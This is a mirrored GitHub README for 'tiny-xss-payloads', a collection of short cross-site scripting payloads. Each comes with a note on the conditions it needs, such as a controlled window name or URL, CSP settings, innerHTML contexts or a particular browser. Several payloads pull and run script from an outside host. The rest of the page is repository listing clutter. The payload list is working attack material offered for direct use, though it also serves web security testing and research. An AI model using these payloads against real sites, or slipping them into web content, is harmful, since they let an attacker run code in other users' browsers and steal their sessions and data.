Giter Club home page Giter Club logo

tiny-xss-payloads's Introduction

Tiny-XSS-Payloads

A collection of short XSS payloads that can be used in different contexts.

The DEMO available here: https://tinyxss.terjanq.me

Current Payloads

<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)>
<!-- Just a casual script -->
<script/src=//NJ.₨></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)>
<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\NJ.₨/)>

Deprecated:

<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>
<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>

tiny-xss-payloads's People

Contributors

erjanmx avatar lbherrera avatar terjanq avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

bbhunter gopalsingh112 vishal9066 chanpu9 chouaibhm tequreq n0maj1o24 easyrider alishahmughal123 533k0 hacker-steroids sundarlal12 createuseraccount suvrajeet01 0xbadca7 reposities daydayup40 willdawnlll marz-hunter sec-js yijinglab shaunstanislauslau baconbao pranavjoy faisal-w vedangshah cybernetics zeroc00i f-alpha5 hollow667 materaj2 5l1v3r1 idreessyed dinh safisec d1pakda5 briansandro saiceh polling-repo-continua matiaslopezd saikrishnadm signedbytes ioribrn shubhamgupta0x0 brukusec 0xsapra ameg-yag tink2hack th3cyb3rc0p 0000000100000000 prashant0313 herisatry faisalrathore marv21 yagamishadow crackerboy l34rner ncupeterpan chrisjcox79 saurabh96216 rajivraj demityang2an ravirajrao amrutawandre psbachto elamaran619 mondayice danieljpinto amint745 abhijit-shinde affilares batamhacker anthonymcqueen21 bthrx lehonid whitehat001 terraki 0xmaximus 3ecurity sun363587351 silentsoul04 sulaimanzai beerandgin gregiss kidz0702 ibeginer galaxylove xiju2003 simolin hittergo wileysec lucifielhack sjpi nhienit2010 darius-1024 daniyyell navidof5 nomuna xeno6696 j-arinam

tiny-xss-payloads's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.